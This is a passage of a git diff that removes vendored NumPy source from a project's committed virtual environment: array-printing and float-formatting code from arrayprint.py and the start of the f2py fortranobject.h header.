next_line_prefix, legacy): - needs_wrap = len(line) + len(word) > line_width - if legacy > 113: - # don't wrap lines if it won't help - if len(line) <= len(next_line_prefix): - needs_wrap = False - - if needs_wrap: - s += line.rstrip() + "\n" - line = next_line_prefix - line += word - return s, line - - -def _extendLine_pretty(s, line, word, line_width, next_line_prefix, legacy): - """ - Extends line with nicely formatted (possibly multi-line) string ``word``. 
- """ - words = word.splitlines() - if len(words) == 1 or legacy <= 113: - return _extendLine(s, line, word, line_width, next_line_prefix, legacy) - - max_word_length = max(len(word) for word in words) - if (len(line) + max_word_length > line_width and - len(line) > len(next_line_prefix)): - s += line.rstrip() + '\n' - line = next_line_prefix + words[0] - indent = next_line_prefix - else: - indent = len(line)*' ' - line += words[0] - - for word in words[1::]: - s += line.rstrip() + '\n' - line = indent + word - - suffix_length = max_word_length - len(words[-1]) - line += suffix_length*' ' - - return s, line - -def _formatArray(a, format_function, line_width, next_line_prefix, - separator, edge_items, summary_insert, legacy): - """formatArray is designed for two modes of operation: - - 1. Full output - - 2. Summarized output - - """ - def recurser(index, hanging_indent, curr_width): - """ - By using this local function, we don't need to recurse with all the - arguments. Since this function is not created recursively, the cost is - not significant - """ - axis = len(index) - axes_left = a.ndim - axis - - if axes_left == 0: - return format_function(a[index]) - - # when recursing, add a space to align with the [ added, and reduce the - # length of the line by 1 - next_hanging_indent = hanging_indent + ' ' - if legacy <= 113: - next_width = curr_width - else: - next_width = curr_width - len(']') - - a_len = a.shape[axis] - show_summary = summary_insert and 2*edge_items < a_len - if show_summary: - leading_items = edge_items - trailing_items = edge_items - else: - leading_items = 0 - trailing_items = a_len - - # stringify the array with the hanging indent on the first line too - s = '' - - # last axis (rows) - wrap elements if they would not fit on one line - if axes_left == 1: - # the length up until the beginning of the separator / bracket - if legacy <= 113: - elem_width = curr_width - len(separator.rstrip()) - else: - elem_width = curr_width - 
max(len(separator.rstrip()), len(']')) - - line = hanging_indent - for i in range(leading_items): - word = recurser(index + (i,), next_hanging_indent, next_width) - s, line = _extendLine_pretty( - s, line, word, elem_width, hanging_indent, legacy) - line += separator - - if show_summary: - s, line = _extendLine( - s, line, summary_insert, elem_width, hanging_indent, legacy) - if legacy <= 113: - line += ", " - else: - line += separator - - for i in range(trailing_items, 1, -1): - word = recurser(index + (-i,), next_hanging_indent, next_width) - s, line = _extendLine_pretty( - s, line, word, elem_width, hanging_indent, legacy) - line += separator - - if legacy <= 113: - # width of the separator is not considered on 1.13 - elem_width = curr_width - word = recurser(index + (-1,), next_hanging_indent, next_width) - s, line = _extendLine_pretty( - s, line, word, elem_width, hanging_indent, legacy) - - s += line - - # other axes - insert newlines between rows - else: - s = '' - line_sep = separator.rstrip() + '\n'*(axes_left - 1) - - for i in range(leading_items): - nested = recurser(index + (i,), next_hanging_indent, next_width) - s += hanging_indent + nested + line_sep - - if show_summary: - if legacy <= 113: - # trailing space, fixed nbr of newlines, and fixed separator - s += hanging_indent + summary_insert + ", \n" - else: - s += hanging_indent + summary_insert + line_sep - - for i in range(trailing_items, 1, -1): - nested = recurser(index + (-i,), next_hanging_indent, - next_width) - s += hanging_indent + nested + line_sep - - nested = recurser(index + (-1,), next_hanging_indent, next_width) - s += hanging_indent + nested - - # remove the hanging indent, and wrap in [] - s = '[' + s[len(hanging_indent):] + ']' - return s - - try: - # invoke the recursive part with an initial index and prefix - return recurser(index=(), - hanging_indent=next_line_prefix, - curr_width=line_width) - finally: - # recursive closures have a cyclic reference to themselves, which - # 
requires gc to collect (gh-10620). To avoid this problem, for - # performance and PyPy friendliness, we break the cycle: - recurser = None - -def _none_or_positive_arg(x, name): - if x is None: - return -1 - if x < 0: - raise ValueError("{} must be >= 0".format(name)) - return x - -class FloatingFormat: - """ Formatter for subtypes of np.floating """ - def __init__(self, data, precision, floatmode, suppress_small, sign=False, - *, legacy=None): - # for backcompatibility, accept bools - if isinstance(sign, bool): - sign = '+' if sign else '-' - - self._legacy = legacy - if self._legacy <= 113: - # when not 0d, legacy does not support '-' - if data.shape != () and sign == '-': - sign = ' ' - - self.floatmode = floatmode - if floatmode == 'unique': - self.precision = None - else: - self.precision = precision - - self.precision = _none_or_positive_arg(self.precision, 'precision') - - self.suppress_small = suppress_small - self.sign = sign - self.exp_format = False - self.large_exponent = False - - self.fillFormat(data) - - def fillFormat(self, data): - # only the finite values are used to compute the number of digits - finite_vals = data[isfinite(data)] - - # choose exponential mode based on the non-zero finite values: - abs_non_zero = absolute(finite_vals[finite_vals != 0]) - if len(abs_non_zero) != 0: - max_val = np.max(abs_non_zero) - min_val = np.min(abs_non_zero) - with errstate(over='ignore'): # division can overflow - if max_val >= 1.e8 or (not self.suppress_small and - (min_val < 0.0001 or max_val/min_val > 1000.)): - self.exp_format = True - - # do a first pass of printing all the numbers, to determine sizes - if len(finite_vals) == 0: - self.pad_left = 0 - self.pad_right = 0 - self.trim = '.' 
- self.exp_size = -1 - self.unique = True - self.min_digits = None - elif self.exp_format: - trim, unique = '.', True - if self.floatmode == 'fixed' or self._legacy <= 113: - trim, unique = 'k', False - strs = (dragon4_scientific(x, precision=self.precision, - unique=unique, trim=trim, sign=self.sign == '+') - for x in finite_vals) - frac_strs, _, exp_strs = zip(*(s.partition('e') for s in strs)) - int_part, frac_part = zip(*(s.split('.') for s in frac_strs)) - self.exp_size = max(len(s) for s in exp_strs) - 1 - - self.trim = 'k' - self.precision = max(len(s) for s in frac_part) - self.min_digits = self.precision - self.unique = unique - - # for back-compat with np 1.13, use 2 spaces & sign and full prec - if self._legacy <= 113: - self.pad_left = 3 - else: - # this should be only 1 or 2. Can be calculated from sign. - self.pad_left = max(len(s) for s in int_part) - # pad_right is only needed for nan length calculation - self.pad_right = self.exp_size + 2 + self.precision - else: - trim, unique = '.', True - if self.floatmode == 'fixed': - trim, unique = 'k', False - strs = (dragon4_positional(x, precision=self.precision, - fractional=True, - unique=unique, trim=trim, - sign=self.sign == '+') - for x in finite_vals) - int_part, frac_part = zip(*(s.split('.') for s in strs)) - if self._legacy <= 113: - self.pad_left = 1 + max(len(s.lstrip('-+')) for s in int_part) - else: - self.pad_left = max(len(s) for s in int_part) - self.pad_right = max(len(s) for s in frac_part) - self.exp_size = -1 - self.unique = unique - - if self.floatmode in ['fixed', 'maxprec_equal']: - self.precision = self.min_digits = self.pad_right - self.trim = 'k' - else: - self.trim = '.' 
- self.min_digits = 0 - - if self._legacy > 113: - # account for sign = ' ' by adding one to pad_left - if self.sign == ' ' and not any(np.signbit(finite_vals)): - self.pad_left += 1 - - # if there are non-finite values, may need to increase pad_left - if data.size != finite_vals.size: - neginf = self.sign != '-' or any(data[isinf(data)] < 0) - nanlen = len(_format_options['nanstr']) - inflen = len(_format_options['infstr']) + neginf - offset = self.pad_right + 1 # +1 for decimal pt - self.pad_left = max(self.pad_left, nanlen - offset, inflen - offset) - - def __call__(self, x): - if not np.isfinite(x): - with errstate(invalid='ignore'): - if np.isnan(x): - sign = '+' if self.sign == '+' else '' - ret = sign + _format_options['nanstr'] - else: # isinf - sign = '-' if x < 0 else '+' if self.sign == '+' else '' - ret = sign + _format_options['infstr'] - return ' '*(self.pad_left + self.pad_right + 1 - len(ret)) + ret - - if self.exp_format: - return dragon4_scientific(x, - precision=self.precision, - min_digits=self.min_digits, - unique=self.unique, - trim=self.trim, - sign=self.sign == '+', - pad_left=self.pad_left, - exp_digits=self.exp_size) - else: - return dragon4_positional(x, - precision=self.precision, - min_digits=self.min_digits, - unique=self.unique, - fractional=True, - trim=self.trim, - sign=self.sign == '+', - pad_left=self.pad_left, - pad_right=self.pad_right) - - -@set_module('numpy') -def format_float_scientific(x, precision=None, unique=True, trim='k', - sign=False, pad_left=None, exp_digits=None, - min_digits=None): - """ - Format a floating-point scalar as a decimal string in scientific notation. - - Provides control over rounding, trimming and padding. Uses and assumes - IEEE unbiased rounding. Uses the "Dragon4" algorithm. - - Parameters - ---------- - x : python float or numpy floating scalar - Value to format. - precision : non-negative integer or None, optional - Maximum number of digits to print. 
May be None if `unique` is - `True`, but must be an integer if unique is `False`. - unique : boolean, optional - If `True`, use a digit-generation strategy which gives the shortest - representation which uniquely identifies the floating-point number from - other values of the same type, by judicious rounding. If `precision` - is given fewer digits than necessary can be printed. If `min_digits` - is given more can be printed, in which cases the last digit is rounded - with unbiased rounding. - If `False`, digits are generated as if printing an infinite-precision - value and stopping after `precision` digits, rounding the remaining - value with unbiased rounding - trim : one of 'k', '.', '0', '-', optional - Controls post-processing trimming of trailing digits, as follows: - - * 'k' : keep trailing zeros, keep decimal point (no trimming) - * '.' : trim all trailing zeros, leave decimal point - * '0' : trim all but the zero before the decimal point. Insert the - zero if it is missing. - * '-' : trim trailing zeros and any trailing decimal point - sign : boolean, optional - Whether to show the sign for positive values. - pad_left : non-negative integer, optional - Pad the left side of the string with whitespace until at least that - many characters are to the left of the decimal point. - exp_digits : non-negative integer, optional - Pad the exponent with zeros until it contains at least this many digits. - If omitted, the exponent will be at least 2 digits. - min_digits : non-negative integer or None, optional - Minimum number of digits to print. This only has an effect for - `unique=True`. In that case more digits than necessary to uniquely - identify the value may be printed and rounded unbiased. 
- - .. versionadded:: 1.21.0 - - Returns - ------- - rep : string - The string representation of the floating point value - - See Also - -------- - format_float_positional - - Examples - -------- - >>> np.format_float_scientific(np.float32(np.pi)) - '3.1415927e+00' - >>> s = np.float32(1.23e24) - >>> np.format_float_scientific(s, unique=False, precision=15) - '1.230000071797338e+24' - >>> np.format_float_scientific(s, exp_digits=4) - '1.23e+0024' - """ - precision = _none_or_positive_arg(precision, 'precision') - pad_left = _none_or_positive_arg(pad_left, 'pad_left') - exp_digits = _none_or_positive_arg(exp_digits, 'exp_digits') - min_digits = _none_or_positive_arg(min_digits, 'min_digits') - if min_digits > 0 and precision > 0 and min_digits > precision: - raise ValueError("min_digits must be less than or equal to precision") - return dragon4_scientific(x, precision=precision, unique=unique, - trim=trim, sign=sign, pad_left=pad_left, - exp_digits=exp_digits, min_digits=min_digits) - - -@set_module('numpy') -def format_float_positional(x, precision=None, unique=True, - fractional=True, trim='k', sign=False, - pad_left=None, pad_right=None, min_digits=None): - """ - Format a floating-point scalar as a decimal string in positional notation. - - Provides control over rounding, trimming and padding. Uses and assumes - IEEE unbiased rounding. Uses the "Dragon4" algorithm. - - Parameters - ---------- - x : python float or numpy floating scalar - Value to format. - precision : non-negative integer or None, optional - Maximum number of digits to print. May be None if `unique` is - `True`, but must be an integer if unique is `False`. - unique : boolean, optional - If `True`, use a digit-generation strategy which gives the shortest - representation which uniquely identifies the floating-point number from - other values of the same type, by judicious rounding. 
If `precision` - is given fewer digits than necessary can be printed, or if `min_digits` - is given more can be printed, in which cases the last digit is rounded - with unbiased rounding. - If `False`, digits are generated as if printing an infinite-precision - value and stopping after `precision` digits, rounding the remaining - value with unbiased rounding - fractional : boolean, optional - If `True`, the cutoffs of `precision` and `min_digits` refer to the - total number of digits after the decimal point, including leading - zeros. - If `False`, `precision` and `min_digits` refer to the total number of - significant digits, before or after the decimal point, ignoring leading - zeros. - trim : one of 'k', '.', '0', '-', optional - Controls post-processing trimming of trailing digits, as follows: - - * 'k' : keep trailing zeros, keep decimal point (no trimming) - * '.' : trim all trailing zeros, leave decimal point - * '0' : trim all but the zero before the decimal point. Insert the - zero if it is missing. - * '-' : trim trailing zeros and any trailing decimal point - sign : boolean, optional - Whether to show the sign for positive values. - pad_left : non-negative integer, optional - Pad the left side of the string with whitespace until at least that - many characters are to the left of the decimal point. - pad_right : non-negative integer, optional - Pad the right side of the string with whitespace until at least that - many characters are to the right of the decimal point. - min_digits : non-negative integer or None, optional - Minimum number of digits to print. Only has an effect if `unique=True` - in which case additional digits past those necessary to uniquely - identify the value may be printed, rounding the last additional digit. 
- - .. versionadded:: 1.21.0 - - Returns - ------- - rep : string - The string representation of the floating point value - - See Also - -------- - format_float_scientific - - Examples - -------- - >>> np.format_float_positional(np.float32(np.pi)) - '3.1415927' - >>> np.format_float_positional(np.float16(np.pi)) - '3.14' - >>> np.format_float_positional(np.float16(0.3)) - '0.3' - >>> np.format_float_positional(np.float16(0.3), unique=False, precision=10) - '0.3000488281' - """ - precision = _none_or_positive_arg(precision, 'precision') - pad_left = _none_or_positive_arg(pad_left, 'pad_left') - pad_right = _none_or_positive_arg(pad_right, 'pad_right') - min_digits = _none_or_positive_arg(min_digits, 'min_digits') - if not fractional and precision == 0: - raise ValueError("precision must be greater than 0 if " - "fractional=False") - if min_digits > 0 and precision > 0 and min_digits > precision: - raise ValueError("min_digits must be less than or equal to precision") - return dragon4_positional(x, precision=precision, unique=unique, - fractional=fractional, trim=trim, - sign=sign, pad_left=pad_left, - pad_right=pad_right, min_digits=min_digits) - - -class IntegerFormat: - def __init__(self, data): - if data.size > 0: - max_str_len = max(len(str(np.max(data))), - len(str(np.min(data)))) - else: - max_str_len = 0 - self.format = '%{}d'.format(max_str_len) - - def __call__(self, x): - return self.format % x - - -class BoolFormat: - def __init__(self, data, **kwargs): - # add an extra space so " True" and "False" have the same length and - # array elements align nicely when printed, except in 0d arrays - self.truestr = ' True' if data.shape != () else 'True' - - def __call__(self, x): - return self.truestr if x else "False" - - -class ComplexFloatingFormat: - """ Formatter for subtypes of np.complexfloating """ - def __init__(self, x, precision, floatmode, suppress_small, - sign=False, *, legacy=None): - # for backcompatibility, accept bools - if isinstance(sign, bool): 
- sign = '+' if sign else '-' - - floatmode_real = floatmode_imag = floatmode - if legacy <= 113: - floatmode_real = 'maxprec_equal' - floatmode_imag = 'maxprec' - - self.real_format = FloatingFormat( - x.real, precision, floatmode_real, suppress_small, - sign=sign, legacy=legacy - ) - self.imag_format = FloatingFormat( - x.imag, precision, floatmode_imag, suppress_small, - sign='+', legacy=legacy - ) - - def __call__(self, x): - r = self.real_format(x.real) - i = self.imag_format(x.imag) - - # add the 'j' before the terminal whitespace in i - sp = len(i.rstrip()) - i = i[:sp] + 'j' + i[sp:] - - return r + i - - -class _TimelikeFormat: - def __init__(self, data): - non_nat = data[~isnat(data)] - if len(non_nat) > 0: - # Max str length of non-NaT elements - max_str_len = max(len(self._format_non_nat(np.max(non_nat))), - len(self._format_non_nat(np.min(non_nat)))) - else: - max_str_len = 0 - if len(non_nat) < data.size: - # data contains a NaT - max_str_len = max(max_str_len, 5) - self._format = '%{}s'.format(max_str_len) - self._nat = "'NaT'".rjust(max_str_len) - - def _format_non_nat(self, x): - # override in subclass - raise NotImplementedError - - def __call__(self, x): - if isnat(x): - return self._nat - else: - return self._format % self._format_non_nat(x) - - -class DatetimeFormat(_TimelikeFormat): - def __init__(self, x, unit=None, timezone=None, casting='same_kind', - legacy=False): - # Get the unit from the dtype - if unit is None: - if x.dtype.kind == 'M': - unit = datetime_data(x.dtype)[0] - else: - unit = 's' - - if timezone is None: - timezone = 'naive' - self.timezone = timezone - self.unit = unit - self.casting = casting - self.legacy = legacy - - # must be called after the above are configured - super().__init__(x) - - def __call__(self, x): - if self.legacy <= 113: - return self._format_non_nat(x) - return super().__call__(x) - - def _format_non_nat(self, x): - return "'%s'" % datetime_as_string(x, - unit=self.unit, - timezone=self.timezone, - 
casting=self.casting) - - -class TimedeltaFormat(_TimelikeFormat): - def _format_non_nat(self, x): - return str(x.astype('i8')) - - -class SubArrayFormat: - def __init__(self, format_function, **options): - self.format_function = format_function - self.threshold = options['threshold'] - self.edge_items = options['edgeitems'] - - def __call__(self, a): - self.summary_insert = "..." if a.size > self.threshold else "" - return self.format_array(a) - - def format_array(self, a): - if np.ndim(a) == 0: - return self.format_function(a) - - if self.summary_insert and a.shape[0] > 2*self.edge_items: - formatted = ( - [self.format_array(a_) for a_ in a[:self.edge_items]] - + [self.summary_insert] - + [self.format_array(a_) for a_ in a[-self.edge_items:]] - ) - else: - formatted = [self.format_array(a_) for a_ in a] - - return "[" + ", ".join(formatted) + "]" - - -class StructuredVoidFormat: - """ - Formatter for structured np.void objects. - - This does not work on structured alias types like np.dtype(('i4', 'i2,i2')), - as alias scalars lose their field information, and the implementation - relies upon np.void.__getitem__. - """ - def __init__(self, format_functions): - self.format_functions = format_functions - - @classmethod - def from_data(cls, data, **options): - """ - This is a second way to initialize StructuredVoidFormat, using the raw data - as input. Added to avoid changing the signature of __init__. 
- """ - format_functions = [] - for field_name in data.dtype.names: - format_function = _get_format_function(data[field_name], **options) - if data.dtype[field_name].shape != (): - format_function = SubArrayFormat(format_function, **options) - format_functions.append(format_function) - return cls(format_functions) - - def __call__(self, x): - str_fields = [ - format_function(field) - for field, format_function in zip(x, self.format_functions) - ] - if len(str_fields) == 1: - return "({},)".format(str_fields[0]) - else: - return "({})".format(", ".join(str_fields)) - - -def _void_scalar_repr(x): - """ - Implements the repr for structured-void scalars. It is called from the - scalartypes.c.src code, and is placed here because it uses the elementwise - formatters defined above. - """ - return StructuredVoidFormat.from_data(array(x), **_format_options)(x) - - -_typelessdata = [int_, float_, complex_, bool_] - - -def dtype_is_implied(dtype): - """ - Determine if the given dtype is implied by the representation of its values. - - Parameters - ---------- - dtype : dtype - Data type - - Returns - ------- - implied : bool - True if the dtype is implied by the representation of its values. - - Examples - -------- - >>> np.core.arrayprint.dtype_is_implied(int) - True - >>> np.array([1, 2, 3], int) - array([1, 2, 3]) - >>> np.core.arrayprint.dtype_is_implied(np.int8) - False - >>> np.array([1, 2, 3], np.int8) - array([1, 2, 3], dtype=int8) - """ - dtype = np.dtype(dtype) - if _format_options['legacy'] <= 113 and dtype.type == bool_: - return False - - # not just void types can be structured, and names are not part of the repr - if dtype.names is not None: - return False - - # should care about endianness *unless size is 1* (e.g., int8, bool) - if not dtype.isnative: - return False - - return dtype.type in _typelessdata - - -def dtype_short_repr(dtype): - """ - Convert a dtype to a short form which evaluates to the same dtype. 
- - The intent is roughly that the following holds - - >>> from numpy import * - >>> dt = np.int64([1, 2]).dtype - >>> assert eval(dtype_short_repr(dt)) == dt - """ - if type(dtype).__repr__ != np.dtype.__repr__: - # TODO: Custom repr for user DTypes, logic should likely move. - return repr(dtype) - if dtype.names is not None: - # structured dtypes give a list or tuple repr - return str(dtype) - elif issubclass(dtype.type, flexible): - # handle these separately so they don't give garbage like str256 - return "'%s'" % str(dtype) - - typename = dtype.name - if not dtype.isnative: - # deal with cases like dtype('<u2') that are identical to an - # established dtype (in this case uint16) - typename = "'%s'" % str(dtype) - - return typename - - -def _array_repr_implementation( - arr, max_line_width=None, precision=None, suppress_small=None, - array2string=array2string): - """Internal version of array_repr() that allows overriding array2string.""" - if max_line_width is None: - max_line_width = _format_options['linewidth'] - - if type(arr) is not ndarray: - class_name = type(arr).__name__ - else: - class_name = "array" - - skipdtype = dtype_is_implied(arr.dtype) and arr.size > 0 - - prefix = class_name + "(" - suffix = ")" if skipdtype else "," - - if (_format_options['legacy'] <= 113 and - arr.shape == () and not arr.dtype.names): - lst = repr(arr.item()) - elif arr.size > 0 or arr.shape == (0,): - lst = array2string(arr, max_line_width, precision, suppress_small, - ', ', prefix, suffix=suffix) - else: # show zero-length shape unless it is (0,) - lst = "[], shape=%s" % (repr(arr.shape),) - - arr_str = prefix + lst + suffix - - if skipdtype: - return arr_str - - dtype_str = "dtype={})".format(dtype_short_repr(arr.dtype)) - - # compute whether we should put dtype on a new line: Do so if adding the - # dtype would extend the last line past max_line_width. - # Note: This line gives the correct result even when rfind returns -1. 
- last_line_len = len(arr_str) - (arr_str.rfind('\n') + 1) - spacer = " " - if _format_options['legacy'] <= 113: - if issubclass(arr.dtype.type, flexible): - spacer = '\n' + ' '*len(class_name + "(") - elif last_line_len + len(dtype_str) + 1 > max_line_width: - spacer = '\n' + ' '*len(class_name + "(") - - return arr_str + spacer + dtype_str - - -def _array_repr_dispatcher( - arr, max_line_width=None, precision=None, suppress_small=None): - return (arr,) - - -@array_function_dispatch(_array_repr_dispatcher, module='numpy') -def array_repr(arr, max_line_width=None, precision=None, suppress_small=None): - """ - Return the string representation of an array. - - Parameters - ---------- - arr : ndarray - Input array. - max_line_width : int, optional - Inserts newlines if text is longer than `max_line_width`. - Defaults to ``numpy.get_printoptions()['linewidth']``. - precision : int, optional - Floating point precision. - Defaults to ``numpy.get_printoptions()['precision']``. - suppress_small : bool, optional - Represent numbers "very close" to zero as zero; default is False. - Very close is defined by precision: if the precision is 8, e.g., - numbers smaller (in absolute value) than 5e-9 are represented as - zero. - Defaults to ``numpy.get_printoptions()['suppress']``. - - Returns - ------- - string : str - The string representation of an array. - - See Also - -------- - array_str, array2string, set_printoptions - - Examples - -------- - >>> np.array_repr(np.array([1,2])) - 'array([1, 2])' - >>> np.array_repr(np.ma.array([0.])) - 'MaskedArray([0.])' - >>> np.array_repr(np.array([], np.int32)) - 'array([], dtype=int32)' - - >>> x = np.array([1e-6, 4e-7, 2, 3]) - >>> np.array_repr(x, precision=6, suppress_small=True) - 'array([0.000001, 0. , 2. , 3. 
])' - - """ - return _array_repr_implementation( - arr, max_line_width, precision, suppress_small) - - -@_recursive_guard() -def _guarded_repr_or_str(v): - if isinstance(v, bytes): - return repr(v) - return str(v) - - -def _array_str_implementation( - a, max_line_width=None, precision=None, suppress_small=None, - array2string=array2string): - """Internal version of array_str() that allows overriding array2string.""" - if (_format_options['legacy'] <= 113 and - a.shape == () and not a.dtype.names): - return str(a.item()) - - # the str of 0d arrays is a special case: It should appear like a scalar, - # so floats are not truncated by `precision`, and strings are not wrapped - # in quotes. So we return the str of the scalar value. - if a.shape == (): - # obtain a scalar and call str on it, avoiding problems for subclasses - # for which indexing with () returns a 0d instead of a scalar by using - # ndarray's getindex. Also guard against recursive 0d object arrays. - return _guarded_repr_or_str(np.ndarray.__getitem__(a, ())) - - return array2string(a, max_line_width, precision, suppress_small, ' ', "") - - -def _array_str_dispatcher( - a, max_line_width=None, precision=None, suppress_small=None): - return (a,) - - -@array_function_dispatch(_array_str_dispatcher, module='numpy') -def array_str(a, max_line_width=None, precision=None, suppress_small=None): - """ - Return a string representation of the data in an array. - - The data in the array is returned as a single string. This function is - similar to `array_repr`, the difference being that `array_repr` also - returns information on the kind of array and its data type. - - Parameters - ---------- - a : ndarray - Input array. - max_line_width : int, optional - Inserts newlines if text is longer than `max_line_width`. - Defaults to ``numpy.get_printoptions()['linewidth']``. - precision : int, optional - Floating point precision. - Defaults to ``numpy.get_printoptions()['precision']``. 
- suppress_small : bool, optional - Represent numbers "very close" to zero as zero; default is False. - Very close is defined by precision: if the precision is 8, e.g., - numbers smaller (in absolute value) than 5e-9 are represented as - zero. - Defaults to ``numpy.get_printoptions()['suppress']``. - - See Also - -------- - array2string, array_repr, set_printoptions - - Examples - -------- - >>> np.array_str(np.arange(3)) - '[0 1 2]' - - """ - return _array_str_implementation( - a, max_line_width, precision, suppress_small) - - -# needed if __array_function__ is disabled -_array2string_impl = getattr(array2string, '__wrapped__', array2string) -_default_array_str = functools.partial(_array_str_implementation, - array2string=_array2string_impl) -_default_array_repr = functools.partial(_array_repr_implementation, - array2string=_array2string_impl) - - -def set_string_function(f, repr=True): - """ - Set a Python function to be used when pretty printing arrays. - - Parameters - ---------- - f : function or None - Function to be used to pretty print arrays. The function should expect - a single array argument and return a string of the representation of - the array. If None, the function is reset to the default NumPy function - to print arrays. - repr : bool, optional - If True (default), the function for pretty printing (``__repr__``) - is set, if False the function that returns the default string - representation (``__str__``) is set. - - See Also - -------- - set_printoptions, get_printoptions - - Examples - -------- - >>> def pprint(arr): - ... return 'HA! - What are you going to do now?' - ... - >>> np.set_string_function(pprint) - >>> a = np.arange(10) - >>> a - HA! - What are you going to do now? - >>> _ = a - >>> # [0 1 2 3 4 5 6 7 8 9] - - We can reset the function to the default: - - >>> np.set_string_function(None) - >>> a - array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]) - - `repr` affects either pretty printing or normal string representation. 
- Note that ``__repr__`` is still affected by setting ``__str__`` - because the width of each array element in the returned string becomes - equal to the length of the result of ``__str__()``. - - >>> x = np.arange(4) - >>> np.set_string_function(lambda x:'random', repr=False) - >>> x.__str__() - 'random' - >>> x.__repr__() - 'array([0, 1, 2, 3])' - - """ - if f is None: - if repr: - return multiarray.set_string_function(_default_array_repr, 1) - else: - return multiarray.set_string_function(_default_array_str, 0) - else: - return multiarray.set_string_function(f, repr) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/f2py/src/fortranobject.h b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/f2py/src/fortranobject.h deleted file mode 100644 index abd699c2fe8615c1417a6d58d83937d097867d40..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/f2py/src/fortranobject.h +++ /dev/null @@ -1,173 +0,0 @@ -#ifndef Py_FORTRANOBJECT_H -#define Py_FORTRANOBJECT_H -#ifdef __cplusplus -extern "C" { -#endif - -#include <Python.h> - -#ifndef NPY_NO_DEPRECATED_API -#define NPY_NO_DEPRECATED_API NPY_API_VERSION -#endif -#ifdef FORTRANOBJECT_C -#define NO_IMPORT_ARRAY -#endif -#define PY_ARRAY_UNIQUE_SYMBOL _npy_f2py_ARRAY_API -#include "numpy/arrayobject.h" -#include "numpy/npy_3kcompat.h" - -#ifdef F2PY_REPORT_ATEXIT -#include <sys/time.h> -// clang-format off -extern void f2py_start_clock(void); -extern void f2py_stop_clock(void); -extern void f2py_start_call_clock(void); -extern void f2py_stop_call_clock(void); -extern void f2py_cb_start_clock(void); -extern void f2py_cb_stop_clock(void); -extern void f2py_cb_start_call_clock(void); -extern void f2py_cb_stop_call_clock(void); -extern void f2py_report_on_exit(int, void *); -// clang-format on -#endif - -#ifdef DMALLOC -#include "dmalloc.h" -#endif - -/* Fortran object interface */ - -/* 
-123456789-123456789-123456789-123456789-123456789-123456789-123456789-12 - -PyFortranObject represents various Fortran objects: -Fortran (module) routines, COMMON blocks, module data. - -Author: Pearu Peterson -*/ - -#define F2PY_MAX_DIMS 40 -#define F2PY_MESSAGE_BUFFER_SIZE 300 // Increase on "stack smashing detected" - -typedef void (*f2py_set_data_func)(char *, npy_intp *); -typedef void (*f2py_void_func)(void); -typedef void (*f2py_init_func)(int *, npy_intp *, f2py_set_data_func, int *); - -/*typedef void* (*f2py_c_func)(void*,...);*/ - -typedef void *(*f2pycfunc)(void); - -typedef struct { - char *name; /* attribute (array||routine) name */ - int rank; /* array rank, 0 for scalar, max is F2PY_MAX_DIMS, - || rank=-1 for Fortran routine */ - struct { - npy_intp d[F2PY_MAX_DIMS]; - } dims; /* dimensions of the array, || not used */ - int type; /* PyArray_ || not used */ - int elsize; /* Element size || not used */ - char *data; /* pointer to array || Fortran routine */ - f2py_init_func func; /* initialization function for - allocatable arrays: - func(&rank,dims,set_ptr_func,name,len(name)) - || C/API wrapper for Fortran routine */ - char *doc; /* documentation string; only recommended - for routines. 
*/ -} FortranDataDef; - -typedef struct { - PyObject_HEAD - int len; /* Number of attributes */ - FortranDataDef *defs; /* An array of FortranDataDef's */ - PyObject *dict; /* Fortran object attribute dictionary */ -} PyFortranObject; - -#define PyFortran_Check(op) (Py_TYPE(op) == &PyFortran_Type) -#define PyFortran_Check1(op) (0 == strcmp(Py_TYPE(op)->tp_name, "fortran")) - -extern PyTypeObject PyFortran_Type; -extern int -F2PyDict_SetItemString(PyObject *dict, char *name, PyObject *obj); -extern PyObject * -PyFortranObject_New(FortranDataDef *defs, f2py_void_func init); -extern PyObject * -PyFortranObject_NewAsAttr(FortranDataDef *defs); - -PyObject * -F2PyCapsule_FromVoidPtr(void *ptr, void (*dtor)(PyObject *)); -void * -F2PyCapsule_AsVoidPtr(PyObject *obj); -int -F2PyCapsule_Check(PyObject *ptr); - -extern void * -F2PySwapThreadLocalCallbackPtr(char *key, void *ptr); -extern void * -F2PyGetThreadLocalCallbackPtr(char *key); - -#define ISCONTIGUOUS(m) (PyArray_FLAGS(m) & NPY_ARRAY_C_CONTIGUOUS) -#define F2PY_INTENT_IN 1 -#define F2PY_INTENT_INOUT 2 -#define F2PY_INTENT_OUT 4 -#define F2PY_INTENT_HIDE 8 -#define F2PY_INTENT_CACHE 16 -#define F2PY_INTENT_COPY 32 -#define F2PY_INTENT_C 64 -#define F2PY_OPTIONAL 128 -#define F2PY_INTENT_INPLACE 256 -#define F2PY_INTENT_ALIGNED4 512 -#define F2PY_INTENT_ALIGNED8 1024 -#define F2PY_INTENT_ALIGNED16 2048 - -#define ARRAY_ISALIGNED(ARR, SIZE) ((size_t)(PyArray_DATA(ARR)) % (SIZE) == 0) -#define F2PY_ALIGN4(intent) (intent & F2PY_INTENT_ALIGNED4) -#define F2PY_ALIGN8(intent) (intent & F2PY_INTENT_ALIGNED8) -#define F2PY_ALIGN16(intent) (intent & F2PY_INTENT_ALIGNED16) - -#define F2PY_GET_ALIGNMENT(intent) \ - (F2PY_ALIGN4(intent) \ - ? 4 \ - : (F2PY_ALIGN8(intent) ? 8 : (F2PY_ALIGN16(intent) ? 
